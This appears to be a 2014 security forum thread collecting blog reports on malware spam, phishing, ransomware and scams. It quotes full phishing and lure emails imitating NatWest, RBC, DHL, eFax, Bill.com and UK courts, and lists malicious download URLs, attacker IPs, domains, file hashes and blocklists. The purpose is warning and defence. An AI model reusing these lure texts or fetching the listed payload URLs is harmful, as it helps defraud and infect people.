(English or other languages may be spammed out next.)
* https://www.virustotal.com/en-gb/file/564d1beb56c8738d7d1c00f1e863abe0b0cbc1878c26d9c688df0b61da25875b/analysis/1409926479/
___
NatWest Phish: “You are Logging In from Different Cities”
- https://blog.malwarebytes.org/fraud-scam/2014/09/natwest-phish-you-are-logging-in-from-different-cities/
Sep 5, 2014 - "There’s a NatWest phish in circulation which tries to scare recipients with warnings of logins from multiple cities which it claims is forbidden. Anybody spending a lot of time on the road for work or personal reasons could potentially be panicked into clicking the links in this one. The URL in the mail leads to a 404 error on a website about different types of paint, so it’s likely been reported and / or pulled by the hosts but here’s the text so you can easily spot it the next time it gets rolled out with a fresh URL:
Dear Customer,
During a recent review of your account we found that you are currently logging in from different cities in a suspicious manner that is not compliant with our bank policies.
NatWest customers are not permitted to log in from different places at same time, or using proxies.
For your safety, we have temporarily deactivated your account, to reactive your account please go to our SSL secure link below and update your account credentials.
However, please note that our squad reserves the right to close your account at any time. As such, we encourage you to become familiar with our program policies and monitor your network accordingly.
The email displays the full URL in the text of the legitimate NatWest website, but uses the old trick of making the clickable link take them to a -phish- hosted on a -compromised- website... it’s always a good idea to hover over any clickable link in an email so you can check the final destination... with so many people traveling as part of their job nowadays this could easily snag a few victims."
___
Cryptographic Locker
- http://www.webroot.com/blog/2014/09/05/cryptographic-locker/
Sep 5, 2014 - "... every few weeks we see a -new- encrypting ransomware variant. It’s not surprising either since the business model of ransoming files for money is tried and true. Whether it’s important work documents, treasured wedding pictures, or complete discographies of your favorite artists, everyone has valuable data they don’t want taken. This is the last thing anyone wants to see:
> https://www.webroot.com/blog/wp-content/uploads/2014/09/background-cropped.png
This variant does bring some new features to the scene, but also fails at other lessons learnt by previous variants. Starting with the new features this variant will now just “delete” the files after encrypting them (it just hides them from you). This doesn’t add any more intangibility since they are encrypted with AES-128 anyway, but it does add a greater sense of loss and panic since all of your common data directories will appear to have been cleaned out. Another new feature is the constant raise in price every 24 hours. While price bumping was used on previous variants, this one doesn’t have a limit... this variant falls short on overall volatility is in the failure to delete the VSS (Volume Shadow Service) so using tools like Shadow Explorer* will work to retrieve your files and circumvent paying the ransom. As I’ve said in previous blogs I do expect issues like this to be fixed once this malware is adopted by more botnets for widespread distribution..."
* http://www.shadowexplorer.com/
:fear: :mad:
AplusWebMaster
2014-09-08, 13:20
FYI...
Fake BH Live Tickets SPAM - (bhlive .co.uk / bhlivetickets .co.uk)
- http://blog.dynamoo.com/2014/09/bh-live-tickets-peter-pan-spam.html
8 Sep 2014 - "... very large quantity of these spam emails, purporting to be from:
From: bhlivetickets@ bhlive .co.uk
Date: 8 September 2014 08:43
Subject: Confirmation of Order Number 484914
ORDER CONFIRMATION
Order Number Order Date
484914 07-09-2014 13:00
YOUR E-TICKET(S) ARE ATTACHED TO THIS EMAIL, SENT TO [redacted]. Please print ALL PAGES of the PDF file attached to the email and bring them with you to gain admission to the event...
These emails are -not- from BH Live Tickets and their systems have not been compromised in any way. Instead, these emails are a forgery with an attachment (tickets.3130599.zip or similar) which in turn contains a malicious executable (in this case tickets.332091.exe). The VirusTotal detection rate for this malware is just 3/55*. Comodo CAMAS reports** that this downloads an additional component from tiptrans .com .tr/333 which has a VirusTotal detection rate of 4/51***. According to ThreatExpert****, this second component POSTs some information to 80.94.160.129:8080 (OVH, France) and also appears to contact 92.222.46.165 (National Academy Of Sciences Of Belarus).
Recommended blocklist:
tiptrans .com .tr
92.222.46.165
80.94.160.129"
* https://www.virustotal.com/en-gb/file/7a3a9360cd4dae87981e9e56a988e149223266512ebd468f7c59aacda2c1bfe3/analysis/1410162673/
** http://camas.comodo.com/cgi-bin/submit?file=7a3a9360cd4dae87981e9e56a988e149223266512ebd468f7c59aacda2c1bfe3
*** https://www.virustotal.com/en-gb/file/41de66fb7dc00dd5fe19e2fa6247af3b30b2ed3a80eadc1cc4410ea8b227ef47/analysis/1410163490/
**** http://www.threatexpert.com/report.aspx?md5=992acfe50852f1287394a991645aec4b
- http://myonlinesecurity.co.uk/confirmation-order-number-fake-pdf-malware/
8 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/bhlive_ticketsd.png
> https://www.virustotal.com/en-gb/file/72caf25189d16d81915d78c494cf5b7c93f45b254cb25e31526f7b5b546a9e83/analysis/1410164460/
___
Fake RBS "Important Docs" SPAM - again ...
- http://blog.dynamoo.com/2014/09/rbs-importat-docs-spam.html
8 Sep 2014 - "The Royal Bank of Scotland has been spoofed several times recently, this latest fake spam contains a payload that looks like it might be Cryptowall.
Date: Mon, 8 Sep 2014 15:00:22 +0100 [10:00:22 EDT]
From: Vicente Mcneill [Vicente@rbs .co.uk]
Subject: Important Docs
Please review attached documents regarding your account.
Tel: 01322 929655
Fax: 01322 499190
email: Vicente@ rbs .co.uk ...
Attached is an archive RBS_Account_Documents.zip containing a malicious executable RBS_Account_Documents.scr which has a detection rate at VirusTotal of 4/53*... analysis shows that it attempts to download components from the following locations:
95.141.37.158/0809uk1/NODE01/0/51-SP3/0/
95.141.37.158/0809uk1/NODE01/1/0/0/
95.141.37.158/0809uk1/NODE01/41/5/4/
bullethood.com/ProfilePics/0809uk1.zip
95.141.37.158 is SeFlow.it Internet Services, Italy. bullethood .com is on a shared server at GoDaddy. The malware also appears to be attempting to connect to 94.23.250.88 (OVH, France).
Recommended blocklist:
bullethood .com
95.141.37.158
94.23.250.88"
* https://www.virustotal.com/en-gb/file/f9046c5fbdddee04dd8fbf6e187a630b88a961243b20933afcb0e36091847d59/analysis/1410183105/
___
Cryptowall ransomware ...
- http://arstechnica.com/security/2014/09/ransomware-going-strong-despite-takedown-of-gameover-zeus/
Sept 7 2014 - "... Within a week of the takedown of Gameover Zeus and Cryptolocker, a surge of spam with links to a Cryptolocker copycat, known as Cryptowall, resulted in a jump in ransomware infections, states a report released last week by security-services firm Dell Secureworks*. Cryptowall first appeared in November 2013, and spread slowly, but the group behind the program were ready to take advantage of the vacuum left by the downfall of its predecessor. Being prepared paid off: In six months, the Cryptowall group infected nearly 625,000 systems, and even though only 0.27% of victims paid, the group still made $1.1 million, according to data from a command-and-control server discovered by Dell Secureworks..."
* http://www.secureworks.com/cyber-threat-intelligence/threats/cryptowall-ransomware/
___
‘Dyre’ malware goes after Salesforce users
- https://blog.malwarebytes.org/cyber-crime/2014/09/dyre-malware-goes-after-salesforce-users/
Sep 8, 2014 - "San Francisco-based company Salesforce well-known for its cloud-based Customer Relationship Management (CRM) software, emailed a security advisory to its customers, late Friday.
Copy of the email sent by Salesforce:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/salesforce_email.png
The threat known as Dyre was originally spotted by security firm CSIS* and by PhishMe** which also had uncovered the new malware earlier in June. Back then, the threat was aimed at banks and other financial institutions, something very reminiscent of other banking Trojans such as Zeus and its variants. But researchers discovered that the malware is now capable of capturing login credentials from Salesforce users by -redirecting- them through a phishing website. Dyre will initially infect users through some form of social-engineering, typically with an email that contains a malicious attachment. Once on the system, the malware can act as a man-in-the-middle and intercept every single keystroke. To be clear, this is not a vulnerability with Salesforce or its website, but rather a type of malware that leverages compromised end-point machines... This type of attack could be mean there might be a new trend on the horizon, one that goes after Software as a Service (SaaS) users. Businesses increasingly rely on third-party software providers for their needs because it can be a cheaper option without all the headaches of doing it yourself. For example, instead of managing their own email server, companies will use Office365 or similar cloud-based email solutions. Banking credentials are still the bread-and-butter for the majority of cyber-crooks because they can be immediately used. But the data harvested from many SaaS applications also holds a tremendous value for those willing to invest the time to dig in and find bits of information that could lead to a large compromise in a top-tier business. There is no silver bullet to defend against these threats but once again a healthy balance of end-user education about phishing scams and proper end-point security solutions will go a long way. Data exfiltration is one the most important issues of 2014 with a growing number of businesses being affected. The effects on companies’ brands and trust of their customers can be very damaging and long lasting, not to mention the potential lawsuits that often follow.:
* https://www.csis.dk/en/csis/news/4262/
** http://phishme.com/project-dyre-new-rat-slurps-bank-credentials-bypasses-ssl/
___
Fake "PAYMENT SLIP" SPAM - with an encrypted .7z archive
- http://blog.dynamoo.com/2014/09/payment-slip-spam-comes-with-encrypted.html
8 Sep 2014 - "This spam comes with a malicious attachment:
From: daniel mo [danielweiche002@ gmail .com]
Subject: PAYMENT SLIP
Signed by: gmail .com
Thanks for your last message,
We remitted 30% prepayment today amounting to 51,300USD against your invoice INV332831 as was agreed with you by our purchasing agent. Please check the attached invoice and the payment slip and correspond your account information. You will receive payment in your account after a few days.
Please confirm the receipt below,
kindly use this password {121212} to view attachment for our payment slip;
Thanks,
Daniel
Accounts Assistant
67752222
64472801
Zenia Singapore Pte Ltd
In order to deal with the attachment new order.7z, you'll need something capable of dealing with .7z files (e.g. 7-Zip). Inside the archive is a malicious executable new order.scr which has a VirusTotal detection rate of 5/54*. I have not been able to analyse the malware any further than this."
* https://www.virustotal.com/en-gb/file/b1277d881f6504e668eabdaaced21f66618b2a0cd25ad94fc1e1b1a31806f363/analysis/1410186462/
___
RBC Royal Bank Phish - and PDF malware
- http://myonlinesecurity.co.uk/received-new-secure-message-rbc-royal-bank-customer-service-phishing/
8 Sep 2014 - "'You have received a new secure message from RBC Royal Bank Customer Service' pretending to come from RBC Royal Bank Customer Service <securemessage@ rbc .com> is an attempt to -scam- you and get your bank log on details. It also is trying to infect you and is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email is particularly devious, evil and crafty as it sends you to a site that at first glance you think is a phishing site (if you are unwise enough to click any of the links in the email). However that site also has a hidden iframe that tries to download some malware to the computer if you have a vulnerable version of Java. Then if that isn’t enough when you fill in the log in details on the page the buttons on the page appear to link to the genuine RBC bank site so hovering over the links will fool you into thinking that you are on the genuine RBC site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/rbc.png
... then the sign in button leads you to this webpage where any of the links or the buttons download what appears to be a genuine PDF file that looks blank. That file is a malformed PDF with a script virus embedded that will infect you. This file 09.08.14report.pdf has a current VirusTotal detection rate of 5/55*. These emails contain a genuine PDF file that is malformed and contains a script virus and can infect you with no action on your part by simply previewing the PDF in your browser or in the PDF reader..."
* https://www.virustotal.com/en/file/8c966250202f464973929a31886b6ba8d4454425f9348000833091f9d9e8c59a/analysis/1410199439/
- http://threattrack.tumblr.com/post/96988594103/rbc-royal-bank
Sep 8, 2014 - "Subjects Seen:
You have received a new secure message from RBC Royal Bank Customer Service
Typical e-mail details:
You have received a secure message
This is an automated message sent by Royal Bank Secure Messaging Server.
The link above will only be active until: 09/10/2014
Please click here or follow this link : royalbank.com/cgi-bin/rbaccess/rbcgi3m01
Help is available 24 hours a day by email at secure.emailhelp @rbcroyalbank.com
If you have concerns about the validity of this message, please contact the sender directly. For questions about Royal Bank’s e-mail encryption service, please contact technical support at 1-800-769-2511.
First time users - will need to register before reading the Secure Message.
Malicious URLs:
halilbekrek .com/TUTOS/libs/excel/install6.exe
66.235.98.169/rbc.com/webapp/ukv0/signin/logon.php
66.235.98.169/rbc.com/webapp/ukv0/signin/report/09.08.14report.pdf
84.45.53.45/rbc.com/webapp/ukv0/signin/logon.php
84.45.53.45/rbc.com/webapp/ukv0/signin/message.html
84.45.53.45/rbc.com/webapp/ukv0/signin/report/09.08.14report.pdf
Malicious File Name and MD5:
install6.exe (e3fbc7b3bf11f09c5ee33b1e1b45f81b)
09.08.14report.pdf (ecddafa699814679552d2bf95fc087e5)
OfigGigg.dat (85d42ccc12301bbda27abf4c0b7eb7ff)
66.235.98.169: https://www.virustotal.com/en/ip-address/66.235.98.169/information/
84.45.53.45: https://www.virustotal.com/en/ip-address/84.45.53.45/information/
Tagged: RBC, Vawtrak, CVE-2013-2729
___
Fake Tcn Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/tcn-invoice-n265588248042e-fake-pdf-malware/
8 Sep 2014 - "'Tcn Invoice # N265588248042E' pretending to come from Katharine Norwood <Katharine.Norwood@ advanced-ornamentation .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Good morning...
I requested an invoice yesterday; on the invoice it shows a charge of $585.15 although on my credit card statement it shows a charge of $185.13. Can you please advise on what the total should be and if it is for the amount of $185.13 can you please provide an invoice with that amount.
Thank you.
Katharine Norwood
Administrative Assistant
San Diego, CA 92135
205 840-2913
8 September 2014: Invoice.zip ( 48 kb) : Extracts to Invoice.pdf.scr
Current Virus total detections: 4/55*. This 'Tcn Invoice # N265588248042E' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/52c344196cf767035c404995bb4237677540b2f17e815c4d5433f7b35ffa4d4d/analysis/1410198304/
___
Twitter Phish SPAM: “Strange Rumors About You”
- https://blog.malwarebytes.org/fraud-scam/2014/09/twitter-phishing-spamrun-strange-rumors-about-you/
Sep 8, 2014 - "... an ongoing Twitter spam attack which is sending potential victims to phishing pages via a Tumblr -redirect- . Compromised Twitter accounts and / or bots are sending variations of the below to Twitter users:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/twitterspam1.jpg
We’ve seen some 200+ messages sent in the last ten minutes, and this attack has been ongoing for at least six hours. Here’s the Tumblr -spam- blog which is redirecting to the fake Twitter login, and the -fake- login itself:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/twitterspam2.jpg
...
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/twitterspam3.jpg
The -fake- page reads:
“Your current session has ended.
For security purposes your [sic] were forcibly signed out. You need to verify your Twitter account, please relogin.”
Twitter users should -avoid- signing into Twitter via any of the links being sent around, and always check the URL to ensure they’re entering their credentials in the right place."
211.154.136.106: https://www.virustotal.com/en/ip-address/211.154.136.106/information/
:fear: :mad:
AplusWebMaster
2014-09-09, 15:47
FYI...
Fake Bill.com Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/bill-com-invoice-paid-fake-pdf-malware/
9 Sep 2014 - "'Bill.com Invoice has been paid' pretending to come from The Bill .com Team <notificationonly@ hq.bill .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[ Bill .com image ]
Hi,
Thank you for payment to Bill.com. The credit/debit card you have on file with us was successfully charged $115.33 for the billing period 08/01/14-09/01/14.
The Statement for this account is now available for viewing. Please find it attached to this email.
Have questions? Sign in at our website, then contact support.
Thank you,
The Bill .com Team
Please do not respond to this email. This e-mail was sent from a notification-only e-mail address.
9 September 2014: bill-d59f78596bfa79e01898cf9d0e645b99328028d597e9005146787f09435a01016270d6ffc5d69ec27901.zip ( 486 kb):
Extracts to BILL_ID_895634523945258345873645763459879876432985763298563253245.pdf.exe Current Virus total detections: 28/55*. This Bill .com Invoice has been paid is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e3c2b761ce6a188e9669480d52368f3e865499a06813d939c23ad915d49cba62/analysis/1410252379/
____
“Google dorking“ ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/google-dorking-waking-up-web-admins-everywhere/
Sep 9, 2014 - "Last July, the US Department of Homeland Security warned of a new kind of criminal attack: “Google dorking“*. This refers to asking Google for things they have found via special search operators... Google finds things online using a program that accesses web sites: the Google web crawler, called the Googlebot. When the Googlebot examines the web and finds “secret” data, it adds it to Google’s database just like any other kind of information... suppose your company’s HR representative left a spreadsheet with -confidential- employee data -online- . Since it’s open for everyone to access, the crawler sees and indexes it. From them on, even though it might have been hard to find before, a simple – or not so simple – Google search will point any attacker to it. Google never stored the actual data (unless it was cached), it just made it easier to find. This kind of “attack” has been around for as long as search engines have been around. There are whole books devoted to the subject of “Google dorking”, which is more commonly known as “Google hacking”. Books have been published about it for years, and even the NSA has a 643-page manual that describes in detail how to use Google’s search operators to find information. The warning – as ridiculous as it might seem – has some merit... finding information that has been carelessly left out in the open is not strictly criminal: at the end of the day, it was out there for Googlebot to find. Google can’t be blamed for finding what has been left public; it’s the job of web admins to know what is and isn’t on their servers wide open for the world to see. It’s not just confidential documents that are open to the public, either. As we noted as far back in 2013, industrial control systems could be found via Google searches. Even more worryingly, embedded web servers (such as those used in web cameras) are found online all the time with the Shodan search engine. This latter threat was first documented in 2011, which means that IT administrators have had three years to shut down these servers, but it’s still a problem to this day. In short: this problem has been around for a while, but given that it’s still around an official warning from the DHS is a useful reminder to web admins everywhere: perform “Google dorking” against your own servers frequently, looking for things that shouldn’t be there. If you don’t, somebody else will and their intentions might not be so pure..."
* https://publicintelligence.net/feds-google-dorking/
___
Fake Sage Outdated Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/sage-outdated-invoice-fake-pdf-malware/
9 Sep 2014 - "'Outdated Invoice' pretending to come from Sage Account & Payroll <invoice@ sage .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[Sage logo image ]
Sage Account & Payroll
You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link bellow or click here to view/download your account invoice:
... Account?432532=Invoice_090914.zip
If we hold any information about you which is incorrect or if there are any changes to your details please let us know by so that we can keep our records accurate and up to date. If you would like to update your records or see a copy of the information that we hold about you, you can contact us at Data Protection Officer, Sage (UK) Ltd, North Park, Newcastle-upon-Tyne, NE13 9AA or by email to digital@sage.com. If you request a copy of your information you will need to pay a statutory fee which is currently £10.
The contents of this email and any attachments are confidential...
9 September 2014: invoice_090914.zip ( 18kb) : Extracts to invoice_090914.scr
Current Virus total detections: 4/55* . This 'Outdated Invoice' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e7b04220bc9c21161ba5f6aac8cd7bc2c7951aa80fc68b2d196cb9da7a78dc8d/analysis/1410267601/
- http://blog.dynamoo.com/2014/09/sage-outdated-invoice-spam.html
9 Sep 2014
"Recommended blocklist:
95.141.37.158 ..."
(More detail at the dynamoo URL above.)
95.141.37.158: https://www.virustotal.com/en/ip-address/95.141.37.158/information/
___
Fake NatWest Invoice SPAM - PDF malware
- http://myonlinesecurity.co.uk/important-new-account-invoice-fake-pdf-malware/
9 Sep 2014 - "'Important – New account invoice' pretending to come from NatWest Invoice <invoice@ natwest .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[NatWest logo image]
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here or follow the link below...
9 September 2014: invoice_090914.zip ( 18kb) : Extracts to invoice_090914.scr
Current Virus total detections: 4/55* . This 'Important – New account invoice' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e7b04220bc9c21161ba5f6aac8cd7bc2c7951aa80fc68b2d196cb9da7a78dc8d/analysis/1410267601/
___
Fake Worker’s Compensation SPAM – word.doc malware
- http://myonlinesecurity.co.uk/hmcts-workers-compensation-appeal-fake-word-doc-malware/
9 Sep 2014 - "'HMC&TS Worker’s Compensation Appeal' pretending to come from HM Courts and Tribunals Service <submit.wjq@ courtsni .gov.uk>is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... So far today I have seen several subjects for this email:
HMC&TS Worker’s Compensation Appeal
Worker’s Compensation Summons
HM Courts & Tribunals Service Summons
HM Courts & Tribunals Service
All the emails are very similar, but will have different courts or tribunals listed and different dates, case numbers and tribunal members. The faked sender will always be the same name as the recipient of the email with a few random letters after the name... Email reads:
Worker’s Compensation Appeal Tribunal
Decision # 502
Board Direction To Rehear Decision #695
Claim No.: 2504=5704
Date of Original Notice of Appeal: June 10, 2014
Date Received at The Tribunal: June 19, 2014
Date of Board Direction to Rehear: August 11, 2014
Received: August 20, 2014
Date of Documentary Review by Appeal Committee: August 23, 2014
Date of Decision: September 6, 2014
To Whom It May Concern,
Your Corporation (named Respondent)
Appears to be in default because of its failure to comply with the Administrative Law Judge’s Prehearing Order without decent cause, and such default by Respondent constitutes an admission of all facts alleged in the Complaint and a waiver of Respondent’s right to contest such factual allegations. Respondent violated the section 9(6), paragraph B13(1) of the Jobseekers Act 1995.
We recommend you to download a copy of original Complaint at Tribunal in attachment below...
9 September 2014: Copy68789.zip (66kb): Extracts to Copy of original Complaint at Tribunal.docx.exe
Current Virus total detections: 1/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft word .doc instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c765b5ba935a3c872388185940ca89570a1710e89148ce25caf1a54148079800/analysis/1410269102/
- http://threattrack.tumblr.com/post/97055148048/hm-courts-tribunals-service-spam
Sep 9, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4cb469a9e44e608eacef08eba6109111/tumblr_inline_nbmytoLcAX1r6pupn.png
Malicious File Name and MD5:
Copy4855.zip (854ADF297E8B1D79BA0E744F90AFDE50)
Copy of original Complaint at Tribunal.docx.exe (6D9BDE90B81C064ACA5ED994BC8A981A)
Tagged: HM Courts & Tribunals, Kuluoz
___
Hacks throw 25 malware variants at Apple Mac OS X
- http://www.theinquirer.net/inquirer/news/2363995/hackers-throw-25-malware-variants-at-apple-mac-os-x
Sep 9 2014 - "... 25 varieties of malware, some of which are being used in targeted attacks, warns security firm F-Secure. F-Secure reported uncovering the malware variants in its Threat Report H1 2014*, claiming it discovered the first 20 attack tools earlier this year..."
* http://www.f-secure.com/weblog/archives/00002741.html
Sep 8, 2014
:mad: :fear:
AplusWebMaster
2014-09-10, 14:17
FYI...
Fake DHL invoice SPAM
- http://blog.dynamoo.com/2014/09/geir-myklebust-dhl-no.html
10 Sep 2014 - "Geir Myklebust is a real employee for DHL in Norway, but neither he nor DHL are responsible for this spam run in any way (their systems have NOT been breached either). Instead, it contains a malicious attachment and it should simply be deleted.
From: Geir Myklebust (DHL NO) [Geir.Myklebust@ dhl .com]
Date: 10 September 2014 10:35
Subject: FW: customer acct. no.: 4690086 - invoice 0257241 needs to be paid
Dear Sir.
The attached invoice from Villmarksmessen 2014 has still not been settled.
Please advise as soon as possible.
Thank you and regards,
Geir
Med vennlig hilsen/ Kind Regards
Geir Myklebust
Product Manager, Avd. Trade Fairs & Events
DHL Global Forwarding (Norway) AS
Avd. Trade Fairs & Events
Messeveien 14
2004 Lillestrøm ...
Attached is a ZIP file of various different names (e.g. invoice_0257241.zip), containing a malicious executable file invoice_3466198.exe which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report** shows an attempted connection to voladora .com/Imagenes/qaws.cab which is currently coming up with a socket error. I would recommend that you block access to that domain. Further analysis is pending..."
* https://www.virustotal.com/en-gb/file/779955dd6a5da605f2432449bf1edc35e356a251cf43f3cbfda704a26cac5038/analysis/1410342283/
** http://camas.comodo.com/cgi-bin/submit?file=779955dd6a5da605f2432449bf1edc35e356a251cf43f3cbfda704a26cac5038
"UPDATE: a second malicious binary is doing the round, this time with a detection rate of 2/53***..."
*** https://www.virustotal.com/en-gb/file/febd053fdafbc097eedbacac3e0f97d912f7925ddab0dfc90a32895dac35fbdd/analysis/1410353017/
92.43.17.6: https://www.virustotal.com/en/ip-address/92.43.17.6/information/
- http://myonlinesecurity.co.uk/fw-customer-acct-186588-invoice-9782264-needs-paid-fake-pdf-malware/
10 Sep 2014
- https://www.virustotal.com/en/file/febd053fdafbc097eedbacac3e0f97d912f7925ddab0dfc90a32895dac35fbdd/analysis/1410350810/
___
Fake Overdue invoice SPAM – doc malware
- http://myonlinesecurity.co.uk/overdue-invoice-1197419584-fake-doc-malware/
10 Sep 2014 - "'Overdue invoice #1197419584' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Good afternoon,
I was hoping to hear from you by now. May I have payment on invoice #1197419584 today please, or would you like a further extension?
Best regards,
Cherish Schaunaman
+07540 61 15 69
... or like this one:
This email contains an invoice file in attachment.
10 September 2014 : bill_2014-09-10_09-16-23_1197419584.arj :
Extracts to: bill_2014-09-10_09-16-23_1197419584.exe
Current Virus total detections: 6/55*
Alternative version 10 September 2014 : Invoice4777_2C7.zip :
Extracts to: attachment_scaned.doc .exe
Current Virus total detections: 2/54**
This 'Overdue invoice #1197419584' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft word.doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4c6d8f5ad6ff6f35be8b2fe921fc65619ba5708b5a0597a6929fd3bc3f36aabb/analysis/1410342531/
** https://www.virustotal.com/en/file/877eab31951bb48139f0ec592ce906ff3891a74f078af494eeb8ccbc9d913b52/analysis/1410341816/
___
'Outstanding Warrant' Phone SCAMS
- http://www.hoax-slayer.com/outstanding-warrant-phone-scams.shtml
Sep 10, 2014 - "Scammers posing as law-enforcement officers are cold-calling people and tricking them into paying over the phone to resolve supposedly outstanding warrants. The scammers warn victims that, if they don't pay the requested fee, police may come to their home and arrest them... The scammers are reportedly quite skilled at impersonating police officers and are often able to convince victims that they are legitimate. When victims call back on the number provided, the scammers may identify their 'office' as a seemingly legitimate entity such as the 'County Warrants Department'. This simple -ruse- may further convince victims that the scammer's claims are true... This type of -scam- is certainly nothing new and has been around in various forms for many years... a flurry of reports from several US states suggests that these scammers are currently quite active. The scammers are also using variations of the old jury duty phone scam to steal money from victims. Police will -never- call you and demand an immediate payment to resolve an outstanding warrant. If you receive such a suspect call, do -not- give the caller any personal and financial information and do -not- comply with their instructions. If in doubt, call your local police to check. Do -not- use a phone number provided by the caller. Find a number for police in a local phone directory..."
___
Malvertisements - YouTube, Amazon and Yahoo
- http://www.computerworld.com/article/2604303/malicious-advertising-hits-amazon-youtube-and-yahoo.html
Sep 9, 2014 - "Malicious advertisements have popped up on websites such as YouTube, Amazon and Yahoo, part of a sophisticated campaign to spread malware, Cisco said*... When encountered, the malicious advertisements cause the user to be -redirected- to a different website, which triggers a download based on whether the computer is running Windows or Apple's OS X... Cisco didn't identify the advertising network that is serving the malicious advertisements. Although ad networks try to filter out malicious ones, occasionally bad ones slip in, which for a high-traffic site means a large pool of potential victims... Some of the malicious ads were served on youtube.com, amazon.com and ads.yahoo.com, Pelkmann wrote. All told, 74 domains were serving the ads. When a victim is -redirected- by one of the ads, the computer downloads a piece of malware with a unique checksum, making it harder for security software to detect. The download may also contain legitimate software such as a media player. To be infected, the user must be convinced to open the file. 'The attackers are purely relying on social engineering techniques in order to get the user to install the software package,' Pelkmann wrote. 'No drive-by exploits are being used thus far'..."
* http://blogs.cisco.com/security/kyle-and-stan/
:fear: :mad:
AplusWebMaster
2014-09-11, 14:55
FYI...
Fake job offer SPAM - llcinc .net
- http://blog.dynamoo.com/2014/09/llc-inc-llcincnet-fake-job-offer.html
11 Sep 2014 - "This -fake- company's name looks like it has been designed to be hard to find on Google. The so-called LLC INC using the domain llcinc .net does -not- exist.
Date: Wed, 10 Sep 2014 19:51:50 -0400 [09/10/14 19:51:50 EDT]
From: LLC INC
Reply-To: recruiter@ llcinc .net
Subject: EMPLOYMENT OFFER
Hello,
Good day to you overthere we will like to inform you that our company is currently
opening an opportunity for employment if you are interested please do reply with your resume
to recruiter@ llcinc .net
Thanks
Management LLC INC
This so-called job is going to be something like a money mule, parcel mule or some other illegal activity. The domain llcinc .net was registered just a few days ago with -fake- details... There is no website. The email originates from 209.169.222.37, the mail headers indicate that this is probably a compromised email server mail .swsymphony .org.
Avoid."
___
Fake eFax SPAM leads to Cryptowall
- http://blog.dynamoo.com/2014/09/efax-spam-leads-to-cryptowall.html
11 Sep 2014 - "Yet another -fake- eFax spam. I mean really I cannot remember the last time someone sent me a (real) fax...
From: eFax [message@ inbound .efax .com]
Date: 11 September 2014 20:35
Subject: eFax message from "unknown" - 1 page(s), Caller-ID: 1-865-537-8935
Fax Message [Caller-ID: 1-865-537-8935
You have received a 1 page fax at Fri, 12 Sep 2014 02:35:44 +0700.
* The reference number for this fax is atl_did1-1400166434-52051792384-154.
Click here to view this fax using your PDF reader.
Please visit www .eFax .com/en/efax/twa/page/help if you have any questions regarding this message or your service.
Thank you for using the eFax service! ...
... the link in the message goes somewhere bad, in this case it downloads a ZIP files from cybercity-game .com/game/Documents.zip which unzips to a malicious executable Documents.scr which has a pretty low VirusTotal detection rate of 2/55*. The ThreatTrack report** clearly identifies this as Cryptowall and identifies that it either downloads data from or posts data... The 111.exe has a much wider detection rate of 22/53*** and according the the ThreatTrack analysis of that binary there is some sort of network connection... I would recommend blocking the following:
188.165.204.210
193.19.184.20
193.169.86.151
goodbookideas .com
mtsvp .com
suspendedwar .com "
* https://www.virustotal.com/en-gb/file/687c7d8030b9f15bd2ef857116ef8c0c6fe83aa998ff32dab406beb0d4e759c2/analysis/1410467960/
** http://www.dynamoo.com/files/analysis_2567_79b1f47c0dfd99f974d2920a381ad91f.pdf
*** https://www.virustotal.com/en-gb/file/5db8207e1891b01b84c987f8065c2f646cbcceae9ff5af5198a05f75766e8c39/analysis/1410468901/
___
Malicious WordPress injection sending to 178.62.254.78 and 176.58.100.98
- http://blog.dynamoo.com/2014/09/malicious-wordpress-injection-sending.html
